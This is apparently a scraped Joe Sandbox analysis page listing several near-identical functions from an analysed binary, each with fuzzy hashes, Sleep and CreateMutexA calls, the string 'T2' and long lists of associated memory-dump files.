Associated: 00000000.00000002.1310337826.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310364953.000000000110E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310400501.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310432172.0000000001114000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310466177.0000000001123000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310498687.0000000001124000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2
API String ID: 1464230837-631260391
Opcode ID: 78c10d608ef0e3519d09f83b6af236e75c150e7df48f9a608925908490135442
Instruction ID: d5ddc5b5240ee5e8db36decd7c585dee0e4ede34aaeb9e8a2418d1a01f45e0bb
Opcode Fuzzy Hash: 78c10d608ef0e3519d09f83b6af236e75c150e7df48f9a608925908490135442
Instruction Fuzzy Hash: 113126317042089BFB189F78DC897ADB7A2EBC5314F289628E024F73D6CB7599C18752

Function 00E0A079 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 136
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 00E0A963
CreateMutexA.KERNEL32(00000000,00000000,00E63254), ref: 00E0A981

Strings

T2, xrefs: 00E0A970

Memory Dump Source

Source File: 00000000.00000002.1308657171.0000000000E01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.1308629296.0000000000E00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1308657171.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1308787151.0000000000E69000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1308834246.0000000000E6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1308934215.0000000000E77000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309097929.0000000000FD8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309127459.0000000000FDA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309178812.0000000000FEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309178812.0000000000FFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309239679.0000000001003000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309299951.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309337659.0000000001010000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309363242.0000000001017000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309462623.000000000102F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309511031.0000000001031000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309544664.0000000001038000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309580524.0000000001043000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309648463.000000000105C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309685927.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309715324.0000000001066000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309766440.000000000106F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309808864.0000000001070000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309837022.0000000001073000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309889193.000000000107B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309915807.000000000107D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309942146.000000000107E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309991612.0000000001081000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310046973.000000000108A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310079916.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310108778.0000000001093000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310143480.000000000109B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310181905.00000000010BC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310214491.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310214491.00000000010DC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310275195.00000000010F3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310301954.00000000010F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310337826.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310364953.000000000110E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310400501.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310432172.0000000001114000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310466177.0000000001123000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310498687.0000000001124000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2
API String ID: 1464230837-631260391
Opcode ID: 1d1f965f655e84d6c6a98313fa4b7398bbd66bcc0803237fbd8aa0b46888699d
Instruction ID: 884386fa05d997f8a536b5f478eb48bc675373c13f55e062152e7bc921675c0b
Opcode Fuzzy Hash: 1d1f965f655e84d6c6a98313fa4b7398bbd66bcc0803237fbd8aa0b46888699d
Instruction Fuzzy Hash: 213128717043089BFB18DB78DD89BADB7A2DBC1314F285628E014B73D5CB7559C18752

Function 00E0A1AE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 135
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 00E0A963
CreateMutexA.KERNEL32(00000000,00000000,00E63254), ref: 00E0A981

Strings

T2, xrefs: 00E0A970

Memory Dump Source

Source File: 00000000.00000002.1308657171.0000000000E01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.1308629296.0000000000E00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1308657171.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1308787151.0000000000E69000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1308834246.0000000000E6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1308934215.0000000000E77000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309097929.0000000000FD8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309127459.0000000000FDA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309178812.0000000000FEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309178812.0000000000FFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309239679.0000000001003000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309299951.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309337659.0000000001010000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309363242.0000000001017000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309462623.000000000102F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309511031.0000000001031000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309544664.0000000001038000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309580524.0000000001043000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309648463.000000000105C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309685927.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309715324.0000000001066000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309766440.000000000106F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309808864.0000000001070000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309837022.0000000001073000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309889193.000000000107B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309915807.000000000107D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309942146.000000000107E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309991612.0000000001081000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310046973.000000000108A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310079916.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310108778.0000000001093000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310143480.000000000109B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310181905.00000000010BC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310214491.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310214491.00000000010DC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310275195.00000000010F3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310301954.00000000010F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310337826.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310364953.000000000110E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310400501.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310432172.0000000001114000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310466177.0000000001123000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310498687.0000000001124000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2
API String ID: 1464230837-631260391
Opcode ID: 2ec662fd818b4fd7a29c5f1b8f0b61d8566b883e88843e9bec2732e5282e0091
Instruction ID: e0d294fe9807f4d4bbba04de9c2cb0b9bd01f4b23e96fc1ecdd1a7af5e154ee1
Opcode Fuzzy Hash: 2ec662fd818b4fd7a29c5f1b8f0b61d8566b883e88843e9bec2732e5282e0091
Instruction Fuzzy Hash: 333127717042089FFB08DB78DC897ADB7A2EBC6314F285628E014B73D5DB7559C08652

Function 00E0A418 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 133
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 00E0A963
CreateMutexA.KERNEL32(00000000,00000000,00E63254), ref: 00E0A981

Strings

T2, xrefs: 00E0A970

Memory Dump Source

Source File: 00000000.00000002.1308657171.0000000000E01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.1308629296.0000000000E00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1308657171.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1308787151.0000000000E69000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1308834246.0000000000E6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1308934215.0000000000E77000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309097929.0000000000FD8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309127459.0000000000FDA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309178812.0000000000FEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309178812.0000000000FFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309239679.0000000001003000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309299951.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309337659.0000000001010000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309363242.0000000001017000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309462623.000000000102F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309511031.0000000001031000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309544664.0000000001038000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309580524.0000000001043000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309648463.000000000105C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309685927.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309715324.0000000001066000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309766440.000000000106F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309808864.0000000001070000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309837022.0000000001073000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309889193.000000000107B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309915807.000000000107D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309942146.000000000107E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309991612.0000000001081000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310046973.000000000108A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310079916.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310108778.0000000001093000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310143480.000000000109B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310181905.00000000010BC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310214491.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310214491.00000000010DC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310275195.00000000010F3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310301954.00000000010F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310337826.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310364953.000000000110E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310400501.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310432172.0000000001114000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310466177.0000000001123000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310498687.0000000001124000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2
API String ID: 1464230837-631260391
Opcode ID: dae2ee197aae2a1b408e7c6acb734cf414f88afbd9777af50bdbe6640a8f7db4
Instruction ID: 4e6a5e608c8eea1580a7c601e61b34f8b62bf7fd92fc2a7599cd24b521a099e7
Opcode Fuzzy Hash: dae2ee197aae2a1b408e7c6acb734cf414f88afbd9777af50bdbe6640a8f7db4
Instruction Fuzzy Hash: 5F312C31B043049BFB089B78DC8976DF7A2EBC1314F286228E024B73D5DBB559C08752

Function 00E0A54D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 132
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 00E0A963
CreateMutexA.KERNEL32(00000000,00000000,00E63254), ref: 00E0A981

Strings

T2, xrefs: 00E0A970

Memory Dump Source

Source File: 00000000.00000002.1308657171.0000000000E01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.1308629296.0000000000E00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1308657171.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1308787151.0000000000E69000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1308834246.0000000000E6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1308934215.0000000000E77000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309097929.0000000000FD8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309127459.0000000000FDA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309178812.0000000000FEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309178812.0000000000FFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309239679.0000000001003000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309299951.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309337659.0000000001010000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309363242.0000000001017000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309462623.000000000102F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309511031.0000000001031000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309544664.0000000001038000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309580524.0000000001043000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309648463.000000000105C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309685927.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309715324.0000000001066000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309766440.000000000106F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309808864.0000000001070000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309837022.0000000001073000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309889193.000000000107B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309915807.000000000107D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309942146.000000000107E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309991612.0000000001081000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310046973.000000000108A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310079916.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310108778.0000000001093000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310143480.000000000109B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310181905.00000000010BC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310214491.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310214491.00000000010DC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310275195.00000000010F3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310301954.00000000010F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310337826.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310364953.000000000110E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310400501.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310432172.0000000001114000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310466177.0000000001123000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310498687.0000000001124000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2
API String ID: 1464230837-631260391
Opcode ID: e60838052f6b8dc4ff5d36bfe74828e4ecff3fe7bef94f38a1dc3924b9a1ba34
Instruction ID: 797cd4bcd25fad03104e04b7b29af4b338a49824e1cd277ac5dea8b657f12cf2
Opcode Fuzzy Hash: e60838052f6b8dc4ff5d36bfe74828e4ecff3fe7bef94f38a1dc3924b9a1ba34
Instruction Fuzzy Hash: 80312E317042089BFB18DB78DC89B6DB7A2EBC5318F285628E014B73D5CB7599C18712

Function 00E0A682 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 131
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 00E0A963
CreateMutexA.KERNEL32(00000000,00000000,00E63254), ref: 00E0A981

Strings

T2, xrefs: 00E0A970

Memory Dump Source

Source File: 00000000.00000002.1308657171.0000000000E01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.1308629296.0000000000E00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1308657171.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1308787151.0000000000E69000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1308834246.0000000000E6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1308934215.0000000000E77000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309097929.0000000000FD8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309127459.0000000000FDA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309178812.0000000000FEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309178812.0000000000FFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309239679.0000000001003000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309299951.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309337659.0000000001010000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309363242.0000000001017000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309462623.000000000102F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309511031.0000000001031000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309544664.0000000001038000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309580524.0000000001043000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309648463.000000000105C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309685927.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309715324.0000000001066000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309766440.000000000106F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309808864.0000000001070000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309837022.0000000001073000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309889193.000000000107B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309915807.000000000107D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309942146.000000000107E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309991612.0000000001081000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310046973.000000000108A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310079916.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310108778.0000000001093000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310143480.000000000109B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310181905.00000000010BC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310214491.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310214491.00000000010DC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310275195.00000000010F3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310301954.00000000010F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310337826.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310364953.000000000110E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310400501.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310432172.0000000001114000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310466177.0000000001123000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1310498687.0000000001124000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2
API String ID: 1464230837-631260391
Opcode ID: 26f8e01592f64d0ac3d7e276310952b8045322a87b510467573c647b4c240eae
Instruction ID: e6334f25e520895b4f6d4e46dbb9d347d8a4896e547502c9ecb319176a6b30f9
Opcode Fuzzy Hash: 26f8e01592f64d0ac3d7e276310952b8045322a87b510467573c647b4c240eae
Instruction Fuzzy Hash: BC3115717042089BFB189B78EC89BADB7B2EBC1314F2CA629E014B72D5CB7559C18652

Function 00E09ADC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 00E0A963
CreateMutexA.KERNEL32(00000000,00000000,00E63254), ref: 00E0A981

Strings

T2, xrefs: 00E0A970

Memory Dump Source

Source File: 00000000.00000002.1308657171.0000000000E01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.1308629296.0000000000E00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1308657171.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1308787151.0000000000E69000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1308834246.0000000000E6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1308934215.0000000000E77000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309097929.0000000000FD8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309127459.0000000000FDA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309178812.0000000000FEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309178812.0000000000FFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309239679.0000000001003000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309299951.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309337659.0000000001010000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309363242.0000000001017000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309462623.000000000102F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1309511031.0000000001031000.00000040.00000001.01000000.00000003.sdmpDownload File
